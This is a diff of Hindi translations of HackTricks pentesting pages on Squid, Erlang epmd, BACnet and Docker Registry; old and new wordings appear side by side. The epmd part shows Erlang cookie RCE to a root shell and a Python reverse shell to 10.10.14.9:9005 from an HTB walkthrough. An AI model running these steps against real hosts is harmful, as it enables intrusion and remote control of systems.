**Squid** एक कैशिंग और फॉरवर्डिंग HTTP वेब प्रॉक्सी है। इसका उपयोग विविध प्रकार से किया जाता है, जिसमें बार-बार की गई अनुरोधों को कैशिंग करके वेब सर्वर की गति बढ़ाना, वेब, DNS और अन्य कंप्यूटर नेटवर्क लुकअप्स को कैशिंग करना शामिल है, जो नेटवर्क संसाधनों को साझा करने वाले लोगों के लिए है, और ट्रैफिक फिल्टरिंग करके सुरक्षा में सहायता करना। मुख्य रूप से HTTP और FTP के लिए उपयोग किया जाता है, Squid में इंटरनेट गोफर, SSL, TLS और HTTPS सहित कई अन्य प्रोटोकॉल के लिए सीमित समर्थन शामिल है। Squid SOCKS प्रोटोकॉल का समर्थन नहीं करता है, जैसे कि Privoxy, जिसके साथ Squid का उपयोग SOCKS समर्थन प्रदान करने के लिए किया जा सकता है। (यहाँ से [here](https://en.wikipedia.org/wiki/Squid\_\(software\))).
|
||||
[Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)) से:
|
||||
|
||||
> **Squid** एक कैशिंग और फॉरवर्डिंग HTTP वेब प्रॉक्सी है। इसका व्यापक उपयोग है, जिसमें एक वेब सर्वर को तेज करने के लिए दोहराए गए अनुरोधों को कैश करके, एक समूह के लोगों के लिए वेब, DNS और अन्य कंप्यूटर नेटवर्क खोजों को कैश करके और सुरक्षा में मदद करके ट्रैफिक को फ़िल्टर करके। हालांकि, मुख्य रूप से HTTP और FTP के लिए उपयोग किया जाता है, Squid में इंटरनेट गोफर, SSL, TLS और HTTPS सहित कई अन्य प्रोटोकॉलों के लिए सीमित समर्थन शामिल है। Squid SOCKS प्रोटोकॉल का समर्थन नहीं करता है, जिसके विपरीत, Squid को SOCKS समर्थन प्रदान करने के लिए उपयोग किया जा सकता है।
|
||||
|
||||
**डिफ़ॉल्ट पोर्ट:** 3128
|
||||
```
|
||||
PORT STATE SERVICE VERSION
|
||||
3128/tcp open http-proxy Squid http proxy 4.11
|
||||
```
|
||||
# गणना
|
||||
# जांच
|
||||
|
||||
## वेब प्रॉक्सी
|
||||
|
||||
आप इस खोजी गई सेवा को अपने ब्राउज़र में प्रॉक्सी के रूप में सेट करने का प्रयास कर सकते हैं। हालांकि, यदि यह HTTP प्रमाणीकरण के साथ कॉन्फ़िगर किया गया है तो आपसे उपयोगकर्ता नाम और पासवर्ड के लिए प्रॉम्प्ट किया जाएगा।
|
||||
आप इस खोजी गई सेवा को अपने ब्राउज़र में प्रॉक्सी के रूप में सेट करने का प्रयास कर सकते हैं। हालांकि, यदि यह HTTP प्रमाणीकरण के साथ कॉन्फ़िगर किया गया है तो आपको उपयोक्ता नाम और पासवर्ड के लिए पूछा जाएगा।
|
||||
```bash
|
||||
# Try to proxify curl
|
||||
curl --proxy http://10.10.11.131:3128 http://10.10.11.131
|
||||
```
|
||||
## Nmap का प्रॉक्सीफाइड उपयोग
|
||||
## Nmap प्रॉक्सीकृत
|
||||
|
||||
आप प्रॉक्सी का दुरुपयोग करके **आंतरिक पोर्ट्स को प्रॉक्सीफाइड nmap के जरिए स्कैन** करने का प्रयास भी कर सकते हैं।\
|
||||
प्रॉक्सीचेन्स को स्क्विड प्रॉक्सी का उपयोग करने के लिए कॉन्फ़िगर करें, प्रॉक्सीचेन्स.conf फ़ाइल के अंत में निम्नलिखित पंक्ति जोड़ें: `http 10.10.10.10 3128`
|
||||
आप प्रॉक्सी का दुरुपयोग करके **एनमैप को प्रॉक्सीकृत करके आंतरिक पोर्ट स्कैन करने** की कोशिश भी कर सकते हैं।\
|
||||
proxichains.conf फ़ाइल के अंत में निम्नलिखित पंक्ति जोड़कर squid प्रॉक्सी का उपयोग करने के लिए proxychains को कॉन्फ़िगर करें: `http 10.10.10.10 3128`
|
||||
|
||||
फिर प्रॉक्सीचेन्स के साथ nmap चलाएं ताकि **स्थानीय होस्ट को स्कैन किया जा सके**: `proxychains nmap -sT -n -p- localhost`
|
||||
फिर proxychains के साथ nmap चलाएं ताकि **स्थानीय से होस्ट को स्कैन करें**: `proxychains nmap -sT -n -p- localhost`
|
||||
|
||||
## SPOSE स्कैनर
|
||||
|
||||
|
@ -46,14 +48,14 @@ python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में.
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,32 +1,32 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# मूल जानकारी
|
||||
|
||||
erlang port mapper daemon का उपयोग वितरित erlang उदाहरणों को समन्वयित करने के लिए किया जाता है। इसका काम है **यह ट्रैक रखना कि कौन सा नोड नाम किस पते पर सुनता है**। इसलिए, epmd प्रतीकात्मक नोड नामों को मशीन पतों से मैप करता है।
|
||||
**Erlang Port Mapper Daemon (epmd)** वितरित Erlang इंस्टेंसेज के लिए एक समन्वयक के रूप में कार्य करता है। यह प्रतीकात्मक नोड नामों को मशीन पतों से मैप करने के लिए जिम्मेदार है, मुख्य रूप से यह सुनिश्चित करता है कि प्रत्येक नोड नाम किसी विशिष्ट पते से संबंधित है। **epmd** की यह भूमिका विभिन्न Erlang नोडों के बीच नेटवर्क पर संवाद और संचार के लिए बिना किसी अडचन के संवाद के लिए महत्वपूर्ण है।
|
||||
|
||||
**डिफ़ॉल्ट पोर्ट**: 4369
|
||||
```
|
||||
PORT STATE SERVICE VERSION
|
||||
4369/tcp open epmd Erlang Port Mapper Daemon
|
||||
```
|
||||
यह डिफ़ॉल्ट रूप से RabbitMQ और CouchDB स्थापनाओं पर उपयोग किया जाता है।
|
||||
Yah RabbitMQ aur CouchDB installations par default istemal hota hai.
|
||||
|
||||
# सूचीकरण
|
||||
# Enumeration
|
||||
|
||||
## मैनुअल
|
||||
## Manual
|
||||
```bash
|
||||
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
|
||||
|
||||
|
@ -51,11 +51,11 @@ PORT STATE SERVICE VERSION
|
|||
| kazoo_apps: 11500
|
||||
|_ kazoo-rabbitmq: 25672
|
||||
```
|
||||
# Erlang Cookie RCE
|
||||
# Erlang कुकी RCE
|
||||
|
||||
## रिमोट कनेक्शन
|
||||
|
||||
यदि आप **Authentication cookie को लीक कर सकते हैं**, तो आप होस्ट पर कोड निष्पादित करने में सक्षम होंगे। आमतौर पर, यह कुकी `~/.erlang.cookie` में स्थित होती है और यह पहली बार शुरू होने पर erlang द्वारा जनरेट की जाती है। यदि इसे मैन्युअली संशोधित या सेट नहीं किया गया है, तो यह 20 अक्षरों की लंबाई का एक यादृच्छिक स्ट्रिंग \[A:Z] होता है।
|
||||
अगर आप **प्रमाणीकरण कुकी लीक कर सकते हैं** तो आप मेजबान पर कोड को निष्पादित कर सकेंगे। सामान्यत: यह कुकी `~/.erlang.cookie` में स्थित होती है और पहली बार एरलैंग द्वारा उत्पन्न की जाती है। यदि यह संशोधित नहीं किया गया है या मैन्युअल रूप से सेट नहीं किया गया है तो यह एक यादृच्छिक स्ट्रिंग \[A:Z] है जिसकी लंबाई 20 वर्ण है।
|
||||
```bash
|
||||
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
|
||||
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
|
||||
|
@ -67,22 +67,22 @@ At last, we can start an erlang shell on the remote system.
|
|||
(test@target.fqdn)1>os:cmd("id").
|
||||
"uid=0(root) gid=0(root) groups=0(root)\n"
|
||||
```
|
||||
अधिक जानकारी के लिए [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/) पर देखें।
|
||||
अधिक जानकारी [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/) में उपलब्ध है।\
|
||||
लेखक ने कुकी को ब्रूटफोर्स करने के लिए एक प्रोग्राम भी साझा किया है:
|
||||
|
||||
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
|
||||
|
||||
## स्थानीय कनेक्शन
|
||||
|
||||
इस मामले में हम CouchDB का उपयोग करके स्थानीय रूप से विशेषाधिकार बढ़ाने का दुरुपयोग करेंगे:
|
||||
इस मामले में हम स्थानीय रूप से वर्चस्व बढ़ाने के लिए CouchDB का दुरुपयोग करेंगे:
|
||||
```bash
|
||||
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
|
||||
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
|
||||
"homer\n"
|
||||
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
|
||||
```
|
||||
उदाहरण [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) से लिया गया है\
|
||||
आप **Canape HTB मशीन का उपयोग करके** इस कमजोरी का **शोषण करने** का **अभ्यास** कर सकते हैं।
|
||||
उदाहरण [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) से लिया गया है।\
|
||||
आप **Canape HTB मशीन का उपयोग** कर सकते हैं इस वल्न का **शिकार करने** के लिए।
|
||||
|
||||
## Metasploit
|
||||
```bash
|
||||
|
@ -96,14 +96,14 @@ msf5> use exploit/multi/misc/erlang_cookie_rce
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की हमारी विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,35 +1,30 @@
|
|||
```markdown
|
||||
<details>
|
||||
|
||||
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# प्रोटोकॉल जानकारी
|
||||
# Protocol Information
|
||||
|
||||
**BACnet** एक [संचार प्रोटोकॉल](https://en.wikipedia.org/wiki/Communications_protocol) है जो बिल्डिंग ऑटोमेशन और कंट्रोल \(BAC\) नेटवर्क्स के लिए है जो [ASHRAE](https://en.wikipedia.org/wiki/ASHRAE), [ANSI](https://en.wikipedia.org/wiki/ANSI), और [ISO](https://en.wikipedia.org/wiki/International_Organization_for_Standardization) 16484-5 मानक[\[1\]](https://en.wikipedia.org/wiki/BACnet#cite_note-1) प्रोटोकॉल का उपयोग करते हैं।
|
||||
|
||||
BACnet को डिजाइन किया गया था ताकि [बिल्डिंग ऑटोमेशन](https://en.wikipedia.org/wiki/Building_automation) और कंट्रोल सिस्टम्स के संचार को सक्षम किया जा सके जैसे कि हीटिंग, वेंटिलेटिंग, और एयर-कंडीशनिंग कंट्रोल \([HVAC](https://en.wikipedia.org/wiki/HVAC)\), लाइटिंग कंट्रोल, एक्सेस कंट्रोल, और फायर डिटेक्शन सिस्टम्स और उनके संबंधित उपकरण। BACnet प्रोटोकॉल कंप्यूटरीकृत बिल्डिंग ऑटोमेशन उपकरणों को जानकारी का आदान-प्रदान करने के लिए तंत्र प्रदान करता है, चाहे वे किसी भी विशेष बिल्डिंग सेवा को प्रदर्शित करें।
|
||||
[Wikipedia](https://en.wikipedia.org/wiki/BACnet) से
|
||||
**BACnet** एक **संचार प्रोटोकॉल** है जो बिल्डिंग ऑटोमेशन और नियंत्रण (BAC) नेटवर्क के लिए **ASHRAE**, **ANSI**, और **ISO 16484-5 मानक** प्रोटोकॉल का उपयोग करता है। यह बिल्डिंग ऑटोमेशन और नियंत्रण सिस्टम के बीच संचार को सुविधाजनक बनाता है, जिससे HVAC नियंत्रण, प्रकाश नियंत्रण, पहुंच नियंत्रण, और अग्नि पहचान प्रणालियों जैसी अनुप्रयोगों के बीच जानकारी आदान-प्रदान हो सके। BACnet सुनिश्चित करता है और अनुप्रयोगों के विशेष सेवाओं के बावजूद कंप्यूटरीकृत बिल्डिंग ऑटोमेशन उपकरणों को संचार करने की अनुमति देता है।
|
||||
|
||||
**डिफ़ॉल्ट पोर्ट:** 47808
|
||||
```
|
||||
```text
|
||||
PORT STATE SERVICE
|
||||
47808/udp open BACNet -- Building Automation and Control NetworksEnumerate
|
||||
```
|
||||
# सूचीकरण
|
||||
# जाँच
|
||||
|
||||
## मैनुअल
|
||||
## मैन्युअल
|
||||
```bash
|
||||
pip3 install BAC0
|
||||
import BAC0
|
||||
|
@ -44,25 +39,9 @@ bacnet.vendorName.strValue
|
|||
```bash
|
||||
nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 <IP>
|
||||
```
|
||||
```markdown
|
||||
यह स्क्रिप्ट BACnet नेटवर्क में एक विदेशी डिवाइस के रूप में शामिल होने का प्रयास नहीं करती है, यह केवल एक IP पते वाले डिवाइस को सीधे BACnet अनुरोध भेजती है।
|
||||
यह स्क्रिप्ट एक बीएसीनेट नेटवर्क में एक विदेशी उपकरण के रूप में शामिल होने का प्रयास नहीं करता, बल्कि यह सीधे एक आईपी पते वाले उपकरण को बीएसीनेट अनुरोध भेजता है।
|
||||
|
||||
## Shodan
|
||||
|
||||
* `port:47808 instance`
|
||||
* `"Instance ID" "Vendor Name"`
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**।
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
```
|
||||
|
|
|
@ -1,35 +1,31 @@
|
|||
# 5000 - Docker Registry का पेंटेस्टिंग
|
||||
# 5000 - पेंटेस्टिंग डॉकर रजिस्ट्री
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
|
||||
## मूल जानकारी
|
||||
|
||||
**जानकारी** [**यहाँ से**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**.**
|
||||
**डॉकर इमेजेस** के लिए एक **डॉकर रजिस्ट्री** नामक एक संग्रहण और वितरण प्रणाली है, जिन्हें टैग द्वारा पहचाना जा सकता है और वे कई संस्करणों में आ सकते हैं। ये इमेजेस **डॉकर रेपॉजिटरी** में संगठित होती हैं जो रजिस्ट्री में होती हैं, प्रत्येक रेपॉजिटरी एक विशिष्ट इमेज के विभिन्न संस्करणों को संग्रहित करती है। दी गई कार्यक्षमता इमेजेस को स्थानीय रूप से डाउनलोड करने या रजिस्ट्री में अपलोड करने की अनुमति देती है, यदि उपयोगकर्ता के पास आवश्यक अनुमतियाँ हैं।
|
||||
|
||||
**Docker registry** नामित Docker इमेजेज के लिए एक संग्रहण और वितरण प्रणाली है। एक ही इमेज के कई अलग-अलग संस्करण हो सकते हैं, जिन्हें उनके टैग्स द्वारा पहचाना जाता है।\
|
||||
Docker registry **Docker repositories** में व्यवस्थित होती है, जहाँ एक रिपॉजिटरी में एक विशिष्ट इमेज के सभी संस्करण होते हैं। रजिस्ट्री Docker उपयोगकर्ताओं को स्थानीय रूप से इमेजेज को पुल करने की अनुमति देती है, साथ ही रजिस्ट्री में नई इमेजेज को पुश करने की भी (जब उपयुक्त पहुँच अनुमतियाँ हों तो)।
|
||||
**DockerHub** डॉकर के लिए डिफ़ॉल्ट सार्वजनिक रजिस्ट्री के रूप में काम करता है, लेकिन उपयोगकर्ताओं को खुद का ऑन-प्रीमिस संस्करण चलाने का विकल्प भी है जो खुला स्रोत वाला डॉकर रजिस्ट्री/वितरण है या व्यावसायिक रूप से समर्थित **Docker Trusted Registry** के लिए चुन सकते हैं। इसके अतिरिक्त, विभिन्न अन्य सार्वजनिक रजिस्ट्रियाँ ऑनलाइन उपलब्ध हैं।
|
||||
|
||||
